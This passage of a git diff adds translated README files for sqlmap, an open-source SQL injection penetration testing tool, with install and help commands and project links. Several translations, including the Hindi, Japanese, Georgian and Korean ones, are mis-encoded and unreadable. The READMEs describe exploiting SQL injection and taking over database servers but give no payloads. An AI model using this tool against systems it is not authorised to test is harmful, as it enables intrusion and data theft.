+पà¥à¤°à¤¾à¤¥à¤®à¤¿à¤•त: आप sqlmap को [गिट](https://github.com/sqlmapproject/sqlmap) रिपॉजिटरी कà¥à¤²à¥‹à¤¨ करके भी डाउनलोड कर सकते हैं: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap [Python](https://www.python.org/download/) संसà¥à¤•रण **2.7** और **3.x** पर किसी भी पà¥à¤²à¥‡à¤Ÿà¤«à¤¾à¤°à¥à¤® पर तà¥à¤°à¤‚त काम करता है। + +उपयोग +---- + +मौलिक विकलà¥à¤ªà¥‹à¤‚ और सà¥à¤µà¤¿à¤š की सूची पà¥à¤°à¤¾à¤ªà¥à¤¤ करने के लिà¤: + + python sqlmap.py -h + +सभी विकलà¥à¤ªà¥‹à¤‚ और सà¥à¤µà¤¿à¤š की सूची पà¥à¤°à¤¾à¤ªà¥à¤¤ करने के लिà¤: + + python sqlmap.py -hh + +आप [यहां](https://asciinema.org/a/46601) à¤à¤• नमूना चलाने का पता लगा सकते हैं। sqlmap की कà¥à¤·à¤®à¤¤à¤¾à¤“ं की à¤à¤• अवलोकन पà¥à¤°à¤¾à¤ªà¥à¤¤ करने, समरà¥à¤¥à¤¿à¤¤ फीचरà¥à¤¸ की सूची और सभी विकलà¥à¤ªà¥‹à¤‚ और सà¥à¤µà¤¿à¤š का वरà¥à¤£à¤¨, साथ ही उदाहरणों के साथ, आपको [उपयोगकरà¥à¤¤à¤¾ मैनà¥à¤¯à¥à¤…ल](https://github.com/sqlmapproject/sqlmap/wiki/Usage) पर परामरà¥à¤¶ दिया जाता है। + +लिंक +---- + +* मà¥à¤–पृषà¥à¤ : https://sqlmap.org +* डाउनलोड: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) या [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* संवाद आरà¤à¤¸à¤à¤¸ फ़ीड: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* समसà¥à¤¯à¤¾ टà¥à¤°à¥ˆà¤•र: https://github.com/sqlmapproject/sqlmap/issues +* उपयोगकरà¥à¤¤à¤¾ मैनà¥à¤¯à¥à¤…ल: https://github.com/sqlmapproject/sqlmap/wiki +* अकà¥à¤¸à¤° पूछे जाने वाले पà¥à¤°à¤¶à¥à¤¨ (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* टà¥à¤µà¤¿à¤Ÿà¤°: [@sqlmap](https://x.com/sqlmap) +* डेमो: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* सà¥à¤•à¥à¤°à¥€à¤¨à¤¶à¥‰à¤Ÿ: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots +* diff --git a/doc/translations/README-it-IT.md b/doc/translations/README-it-IT.md new file mode 100644 index 00000000000..6b074141b41 --- /dev/null +++ b/doc/translations/README-it-IT.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band. + +Screenshot +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Nella wiki puoi visitare [l'elenco di screenshot](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) che mostrano il funzionamento di alcune delle funzionalità del programma. + +Installazione +---- + +Puoi scaricare l'ultima tarball cliccando [qui](https://github.com/sqlmapproject/sqlmap/tarball/master) oppure l'ultima zipball cliccando [qui](https://github.com/sqlmapproject/sqlmap/zipball/master). + +La cosa migliore sarebbe però scaricare sqlmap clonando la repository [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap è in grado di funzionare con le versioni **2.7** e **3.x** di [Python](https://www.python.org/download/) su ogni piattaforma. + +Utilizzo +---- + +Per una lista delle opzioni e dei controlli di base: + + python sqlmap.py -h + +Per una lista di tutte le opzioni e di tutti i controlli: + + python sqlmap.py -hh + +Puoi trovare un esempio di esecuzione [qui](https://asciinema.org/a/46601). +Per una panoramica delle capacità di sqlmap, una lista delle sue funzionalità e la descrizione di tutte le sue opzioni e controlli, insieme ad un gran numero di esempi, siete pregati di visitare lo [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (disponibile solo in inglese). + +Link +---- + +* Sito: https://sqlmap.org +* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed dei commit: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* Manuale dell'utente: https://github.com/sqlmapproject/sqlmap/wiki +* Domande più frequenti (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Dimostrazioni: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ja-JP.md b/doc/translations/README-ja-JP.md new file mode 100644 index 00000000000..d43e3f563e1 --- /dev/null +++ b/doc/translations/README-ja-JP.md @@ -0,0 +1,51 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmapã¯ã‚ªãƒ¼ãƒ—ンソースã®ãƒšãƒãƒˆãƒ¬ãƒ¼ã‚·ãƒ§ãƒ³ãƒ†ã‚¹ãƒ†ã‚£ãƒ³ã‚°ãƒ„ールã§ã™ã€‚SQLインジェクションã®è„†å¼±æ€§ã®æ¤œå‡ºã€æ´»ç”¨ã€ãã—ã¦ãƒ‡ãƒ¼ã‚¿ãƒ™ãƒ¼ã‚¹ã‚µãƒ¼ãƒå¥ªå–ã®ãƒ—ロセスを自動化ã—ã¾ã™ã€‚ +å¼·åŠ›ãªæ¤œå‡ºã‚¨ãƒ³ã‚¸ãƒ³ã€ãƒšãƒãƒˆãƒ¬ãƒ¼ã‚·ãƒ§ãƒ³ãƒ†ã‚¹ã‚¿ãƒ¼ã®ãŸã‚ã®å¤šãã®ãƒ‹ãƒƒãƒæ©Ÿèƒ½ã€æŒç¶šçš„ãªãƒ‡ãƒ¼ã‚¿ãƒ™ãƒ¼ã‚¹ã®ãƒ•ィンガープリンティングã‹ã‚‰ã€ãƒ‡ãƒ¼ã‚¿ãƒ™ãƒ¼ã‚¹ã®ãƒ‡ãƒ¼ã‚¿å–得やアウトオブãƒãƒ³ãƒ‰æŽ¥ç¶šã‚’介ã—ãŸã‚ªãƒšãƒ¬ãƒ¼ãƒ†ã‚£ãƒ³ã‚°ãƒ»ã‚·ã‚¹ãƒ†ãƒ ä¸Šã§ã®ã‚³ãƒžãƒ³ãƒ‰å®Ÿè¡Œã€ãƒ•ァイルシステムã¸ã®ã‚¢ã‚¯ã‚»ã‚¹ãªã©ã®åºƒç¯„囲ã«åŠã¶ã‚¹ã‚¤ãƒƒãƒã‚’æä¾›ã—ã¾ã™ã€‚ + +スクリーンショット +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +wikiã«è¼‰ã£ã¦ã„ã‚‹ã„ãã¤ã‹ã®æ©Ÿèƒ½ã®ãƒ‡ãƒ¢ã‚’スクリーンショットã§è¦‹ã‚‹ã“ã¨ãŒã§ãã¾ã™ã€‚ [スクリーンショット集](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) + +インストール +---- + +最新ã®tarballã‚’ [ã“ã¡ã‚‰](https://github.com/sqlmapproject/sqlmap/tarball/master) ã‹ã‚‰ã€æœ€æ–°ã®zipballã‚’ [ã“ã¡ã‚‰](https://github.com/sqlmapproject/sqlmap/zipball/master) ã‹ã‚‰ãƒ€ã‚¦ãƒ³ãƒ­ãƒ¼ãƒ‰ã§ãã¾ã™ã€‚ + +[Git](https://github.com/sqlmapproject/sqlmap) レãƒã‚¸ãƒˆãƒªã‚’クローンã—ã¦ã€sqlmapをダウンロードã™ã‚‹ã“ã¨ã‚‚å¯èƒ½ã§ã™ã€‚: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmapã¯ã€ [Python](https://www.python.org/download/) ãƒãƒ¼ã‚¸ãƒ§ãƒ³ **2.7** ã¾ãŸã¯ **3.x** ãŒã‚¤ãƒ³ã‚¹ãƒˆãƒ¼ãƒ«ã•れã¦ã„れã°ã€å…¨ã¦ã®ãƒ—ラットフォームã§ã™ãã«ä½¿ç”¨ã§ãã¾ã™ã€‚ + +使用方法 +---- + +基本的ãªã‚ªãƒ—ションã¨ã‚¹ã‚¤ãƒƒãƒã®ä½¿ç”¨æ–¹æ³•をリストã§å–å¾—ã™ã‚‹ã«ã¯: + + python sqlmap.py -h + +å…¨ã¦ã®ã‚ªãƒ—ションã¨ã‚¹ã‚¤ãƒƒãƒã®ä½¿ç”¨æ–¹æ³•をリストã§å–å¾—ã™ã‚‹ã«ã¯: + + python sqlmap.py -hh + +実行例を [ã“ã¡ã‚‰](https://asciinema.org/a/46601) ã§è¦‹ã‚‹ã“ã¨ãŒã§ãã¾ã™ã€‚ +sqlmapã®æ¦‚è¦ã€æ©Ÿèƒ½ã®ä¸€è¦§ã€å…¨ã¦ã®ã‚ªãƒ—ションやスイッãƒã®ä½¿ç”¨æ–¹æ³•を例ã¨ã¨ã‚‚ã«ã€ [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) ã§ç¢ºèªã™ã‚‹ã“ã¨ãŒã§ãã¾ã™ã€‚ + +リンク +---- + +* ホームページ: https://sqlmap.org +* ダウンロード: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* コミットã®RSSフィード: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* 課題管ç†: https://github.com/sqlmapproject/sqlmap/issues +* ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki +* よãã‚ã‚‹è³ªå• (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* デモ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ka-GE.md b/doc/translations/README-ka-GE.md new file mode 100644 index 00000000000..12b59b31ea4 --- /dev/null +++ b/doc/translations/README-ka-GE.md @@ -0,0 +1,49 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap áƒáƒ áƒ˜áƒ¡ შეღწევáƒáƒ“áƒáƒ‘ის ტესტირებისáƒáƒ—ვის გáƒáƒœáƒ™áƒ£áƒ—ვილი ინსტრუმენტი, რáƒáƒ›áƒšáƒ˜áƒ¡ კáƒáƒ“იც ღიáƒáƒ“ áƒáƒ áƒ˜áƒ¡ ხელმისáƒáƒ¬áƒ•დáƒáƒ›áƒ˜. ინსტრუმენტი áƒáƒ®áƒ“ენს SQL-ინექციის სისუსტეების áƒáƒ¦áƒ›áƒáƒ©áƒ”ნისáƒ, გáƒáƒ›áƒáƒ§áƒ”ნების დრმáƒáƒœáƒáƒªáƒ”მთრბáƒáƒ–áƒáƒ—რსერვერების დáƒáƒ£áƒ¤áƒšáƒ”ბის პრáƒáƒªáƒ”სების áƒáƒ•ტáƒáƒ›áƒáƒ¢áƒ˜áƒ–áƒáƒªáƒ˜áƒáƒ¡. იგი áƒáƒ¦áƒ­áƒ£áƒ áƒ•ილირმძლáƒáƒ•რი áƒáƒ¦áƒ›áƒáƒ›áƒ©áƒ”ნი მექáƒáƒœáƒ˜áƒ«áƒ›áƒ˜áƒ—, შეღწევáƒáƒ“áƒáƒ‘ის პრáƒáƒ¤áƒ”სიáƒáƒœáƒáƒšáƒ˜ ტესტერისáƒáƒ—ვის შესáƒáƒ¤áƒ”რისი ბევრი ფუნქციით დრსკრიპტების ფáƒáƒ áƒ—რსპექტრით, რáƒáƒ›áƒšáƒ”ბიც შეიძლებრგáƒáƒ›áƒáƒ§áƒ”ნებულ იქნეს მრáƒáƒ•áƒáƒšáƒ˜ მიზნით, მáƒáƒ— შáƒáƒ áƒ˜áƒ¡: მáƒáƒœáƒáƒªáƒ”მთრბáƒáƒ–იდáƒáƒœ მáƒáƒœáƒáƒªáƒ”მების შეგრáƒáƒ•ებისáƒáƒ—ვის, ძირითáƒáƒ“ სáƒáƒ¤áƒáƒ˜áƒšáƒ სისტემáƒáƒ–ე წვდáƒáƒ›áƒ˜áƒ¡áƒáƒ—ვის დრout-of-band კáƒáƒ•შირების გზით áƒáƒžáƒ”რáƒáƒªáƒ˜áƒ£áƒš სისტემáƒáƒ¨áƒ˜ ბრძáƒáƒœáƒ”ბáƒáƒ—რშესრულებისáƒáƒ—ვის. + +ეკრáƒáƒœáƒ˜áƒ¡ áƒáƒœáƒáƒ‘ეჭდები +---- + +![ეკრáƒáƒœáƒ˜áƒ¡ áƒáƒœáƒáƒ‘ეჭდი](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +შეგიძლიáƒáƒ— ესტუმრáƒáƒ— [ეკრáƒáƒœáƒ˜áƒ¡ áƒáƒœáƒáƒ‘ეჭდთრკáƒáƒšáƒ”ქციáƒáƒ¡](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), სáƒáƒ“áƒáƒª დემáƒáƒœáƒ¡áƒ¢áƒ áƒ˜áƒ áƒ”ბულირინსტრუმენტის ზáƒáƒ’იერთი ფუნქციáƒ. + +ინსტáƒáƒšáƒáƒªáƒ˜áƒ +---- + +თქვენ შეგიძლიáƒáƒ— უáƒáƒ®áƒšáƒ”სი tar-áƒáƒ áƒ¥áƒ˜áƒ•ის ჩáƒáƒ›áƒáƒ¢áƒ•ირთვრ[áƒáƒ¥](https://github.com/sqlmapproject/sqlmap/tarball/master) დáƒáƒ¬áƒ™áƒáƒžáƒ£áƒœáƒ”ბით, áƒáƒœ უáƒáƒ®áƒšáƒ”სი zip-áƒáƒ áƒ¥áƒ˜áƒ•ის ჩáƒáƒ›áƒáƒ¢áƒ•ირთვრ[áƒáƒ¥](https://github.com/sqlmapproject/sqlmap/zipball/master) დáƒáƒ¬áƒ™áƒáƒžáƒ£áƒœáƒ”ბით. + +áƒáƒ¡áƒ”ვე შეგიძლიáƒáƒ— (დრსáƒáƒ¡áƒ£áƒ áƒ•ელიáƒ) sqlmap-ის ჩáƒáƒ›áƒáƒ¢áƒ•ირთვრ[Git](https://github.com/sqlmapproject/sqlmap)-სáƒáƒªáƒáƒ•ის (repository) კლáƒáƒœáƒ˜áƒ áƒ”ბით: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap ნებისმიერ პლáƒáƒ¢áƒ¤áƒáƒ áƒ›áƒáƒ–ე მუშáƒáƒáƒ‘ს [Python](https://www.python.org/download/)-ის **2.7** დრ**3.x** ვერსიებთáƒáƒœ. + +გáƒáƒ›áƒáƒ§áƒ”ნებრ+---- + +ძირითáƒáƒ“ი ვáƒáƒ áƒ˜áƒáƒœáƒ¢áƒ”ბისრდრპáƒáƒ áƒáƒ›áƒ”ტრების ჩáƒáƒ›áƒáƒœáƒáƒ—ვáƒáƒšáƒ˜áƒ¡ მისáƒáƒ¦áƒ”ბáƒáƒ“ გáƒáƒ›áƒáƒ˜áƒ§áƒ”ნეთ ბრძáƒáƒœáƒ”ბáƒ: + + python sqlmap.py -h + +ვáƒáƒ áƒ˜áƒáƒœáƒ¢áƒ”ბისრდრპáƒáƒ áƒáƒ›áƒ”ტრების სრული ჩáƒáƒ›áƒáƒœáƒáƒ—ვáƒáƒšáƒ˜áƒ¡ მისáƒáƒ¦áƒ”ბáƒáƒ“ გáƒáƒ›áƒáƒ˜áƒ§áƒ”ნეთ ბრძáƒáƒœáƒ”ბáƒ: + + python sqlmap.py -hh + +გáƒáƒ›áƒáƒ§áƒ”ნების მáƒáƒ áƒ¢áƒ˜áƒ•ი მáƒáƒ’áƒáƒšáƒ˜áƒ—ი შეგიძლიáƒáƒ— იხილáƒáƒ— [áƒáƒ¥](https://asciinema.org/a/46601). sqlmap-ის შესáƒáƒ«áƒšáƒ”ბლáƒáƒ‘áƒáƒ—რმიმáƒáƒ®áƒ˜áƒšáƒ•ის, მხáƒáƒ áƒ“áƒáƒ­áƒ”რილი ფუნქციáƒáƒœáƒáƒšáƒ˜áƒ¡áƒ დრყველრვáƒáƒ áƒ˜áƒáƒœáƒ¢áƒ˜áƒ¡ áƒáƒ¦áƒ¬áƒ”რების მისáƒáƒ¦áƒ”ბáƒáƒ“ გáƒáƒ›áƒáƒ§áƒ”ნების მáƒáƒ’áƒáƒšáƒ˜áƒ—ებთáƒáƒœ ერთáƒáƒ“, გირჩევთ, იხილáƒáƒ— [მáƒáƒ›áƒ®áƒ›áƒáƒ áƒ”ბლის სáƒáƒ®áƒ”ლმძღვáƒáƒœáƒ”ლáƒ](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +ბმულები +---- + +* სáƒáƒ¬áƒ§áƒ˜áƒ¡áƒ˜ გვერდი: https://sqlmap.org +* ჩáƒáƒ›áƒáƒ¢áƒ•ირთვáƒ: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) áƒáƒœ [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS áƒáƒ áƒ®áƒ˜: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* პრáƒáƒ‘ლემებისáƒáƒ—ვის თვáƒáƒšáƒ§áƒ£áƒ áƒ˜áƒ¡ დევნებáƒ: https://github.com/sqlmapproject/sqlmap/issues +* მáƒáƒ›áƒ®áƒ›áƒáƒ áƒ”ბლის სáƒáƒ®áƒ”ლმძღვáƒáƒœáƒ”ლáƒ: https://github.com/sqlmapproject/sqlmap/wiki +* ხშირáƒáƒ“ დáƒáƒ¡áƒ›áƒ£áƒšáƒ˜ კითხვები (ხდკ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* დემáƒáƒœáƒ¡áƒ¢áƒ áƒáƒªáƒ˜áƒ”ბი: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* ეკრáƒáƒœáƒ˜áƒ¡ áƒáƒœáƒáƒ‘ეჭდები: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ko-KR.md b/doc/translations/README-ko-KR.md new file mode 100644 index 00000000000..2542209833e --- /dev/null +++ b/doc/translations/README-ko-KR.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmapì€ SQL ì¸ì ì…˜ 결함 íƒì§€ ë° í™œìš©, ë°ì´í„°ë² ì´ìФ 서버 장악 프로세스를 ìžë™í™” 하는 오픈소스 침투 테스팅 ë„구입니다. ìµœê³ ì˜ ì¹¨íˆ¬ 테스터, ë°ì´í„°ë² ì´ìФ 핑거프린팅 부터 ë°ì´í„°ë² ì´ìФ ë°ì´í„° ì½ê¸°, 대역 외 ì—°ê²°ì„ í†µí•œ 기반 íŒŒì¼ ì‹œìŠ¤í…œ ì ‘ê·¼ ë° ëª…ë ¹ì–´ ì‹¤í–‰ì— ê±¸ì¹˜ëŠ” 광범위한 ìŠ¤ìœ„ì¹˜ë“¤ì„ ìœ„í•œ 강력한 íƒì§€ 엔진과 ë‹¤ìˆ˜ì˜ íŽ¸ë¦¬í•œ ê¸°ëŠ¥ì´ íƒ‘ìž¬ë˜ì–´ 있습니다. + +스í¬ë¦°ìƒ· +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +ë˜ëŠ”, wikiì— ë‚˜ì™€ìžˆëŠ” 몇몇 ê¸°ëŠ¥ì„ ë³´ì—¬ì£¼ëŠ” [스í¬ë¦°ìƒ· 모ìŒ](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) ì„ ë°©ë¬¸í•˜ì‹¤ 수 있습니다. + +설치 +---- + +[여기](https://github.com/sqlmapproject/sqlmap/tarball/master)를 í´ë¦­í•˜ì—¬ 최신 ë²„ì „ì˜ tarball 파ì¼, ë˜ëŠ” [여기](https://github.com/sqlmapproject/sqlmap/zipball/master)를 í´ë¦­í•˜ì—¬ 최신 zipball 파ì¼ì„ 다운받으실 수 있습니다. + +가장 선호ë˜ëŠ” 방법으로, [Git](https://github.com/sqlmapproject/sqlmap) 저장소를 복제하여 sqlmapì„ ë‹¤ìš´ë¡œë“œ í•  수 있습니다: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmapì€ [Python](https://www.python.org/download/) 버전 **2.7** 그리고 **3.x** ì„ í†µí•´ 모든 í”Œëž«í¼ ìœ„ì—서 사용 가능합니다. + +사용법 +---- + +기본 옵션과 스위치 목ë¡ì„ 보려면 ë‹¤ìŒ ëª…ë ¹ì–´ë¥¼ 사용하세요: + + python sqlmap.py -h + +ì „ì²´ 옵션과 스위치 목ë¡ì„ 보려면 ë‹¤ìŒ ëª…ë ¹ì–´ë¥¼ 사용하세요: + + python sqlmap.py -hh + +[여기](https://asciinema.org/a/46601)를 통해 사용 ìƒ˜í”Œë“¤ì„ í™•ì¸í•  수 있습니다. +sqlmapì˜ ëŠ¥ë ¥, ì§€ì›ë˜ëŠ” 기능과 모든 옵션과 ìŠ¤ìœ„ì¹˜ë“¤ì˜ ëª©ë¡ì„ 예제와 함께 보려면, [ì‚¬ìš©ìž ë§¤ë‰´ì–¼](https://github.com/sqlmapproject/sqlmap/wiki/Usage)ì„ ì°¸ê³ í•˜ì‹œê¸¸ 권장드립니다. + +ë§í¬ +---- + +* 홈페ì´ì§€: https://sqlmap.org +* 다운로드: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS 피드 커밋: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* ì‚¬ìš©ìž ë§¤ë‰´ì–¼: https://github.com/sqlmapproject/sqlmap/wiki +* ìžì£¼ 묻는 질문 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* 트위터: [@sqlmap](https://x.com/sqlmap) +* 시연 ì˜ìƒ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* 스í¬ë¦°ìƒ·: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-nl-NL.md b/doc/translations/README-nl-NL.md new file mode 100644 index 00000000000..f114168410d --- /dev/null +++ b/doc/translations/README-nl-NL.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap is een open source penetratie test tool dat het proces automatiseert van het detecteren en exploiteren van SQL injectie fouten en het overnemen van database servers. Het wordt geleverd met een krachtige detectie-engine, vele niche-functies voor de ultieme penetratietester, en een breed scala aan switches, waaronder database fingerprinting, het overhalen van gegevens uit de database, toegang tot het onderliggende bestandssysteem, en het uitvoeren van commando's op het besturingssysteem via out-of-band verbindingen. + +Screenshots +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Je kunt de [collectie met screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) bezoeken voor een demonstratie van sommige functies in the wiki. + +Installatie +---- + +Je kunt de laatste tarball installeren door [hier](https://github.com/sqlmapproject/sqlmap/tarball/master) te klikken of de laatste zipball door [hier](https://github.com/sqlmapproject/sqlmap/zipball/master) te klikken. + +Bij voorkeur, kun je sqlmap downloaden door de [Git](https://github.com/sqlmapproject/sqlmap) repository te clonen: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap werkt op alle platformen met de volgende [Python](https://www.python.org/download/) versies: **2.7** en **3.x**. + +Gebruik +---- + +Om een lijst van basisopties en switches te krijgen gebruik: + + python sqlmap.py -h + +Om een lijst van alle opties en switches te krijgen gebruik: + + python sqlmap.py -hh + +Je kunt [hier](https://asciinema.org/a/46601) een proefrun vinden. +Voor een overzicht van de mogelijkheden van sqlmap, een lijst van ondersteunde functies, en een beschrijving van alle opties en switches, samen met voorbeelden, wordt u aangeraden de [gebruikershandleiding](https://github.com/sqlmapproject/sqlmap/wiki/Usage) te raadplegen. + +Links +---- + +* Homepage: https://sqlmap.org +* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) of [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Probleem tracker: https://github.com/sqlmapproject/sqlmap/issues +* Gebruikers handleiding: https://github.com/sqlmapproject/sqlmap/wiki +* Vaak gestelde vragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-pl-PL.md b/doc/translations/README-pl-PL.md new file mode 100644 index 00000000000..e7b145e96b8 --- /dev/null +++ b/doc/translations/README-pl-PL.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap to open sourceowe narzÄ™dzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odpornoÅ›ci serwerów SQL na podatność na iniekcjÄ™ niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji poczÄ…wszy od identyfikacji bazy danych, poprzez wydobywanie z niej danych, a nawet pozwalajÄ…cych na dostÄ™p do systemu plików oraz wykonywanie poleceÅ„ w systemie operacyjnym serwera poprzez niestandardowe połączenia. + +Zrzuty ekranu +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Możesz odwiedzić [kolekcjÄ™ zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrujÄ…cÄ… na wiki niektóre możliwoÅ›ci. + +Instalacja +---- + +Najnowsze tarball archiwum jest dostÄ™pne po klikniÄ™ciu 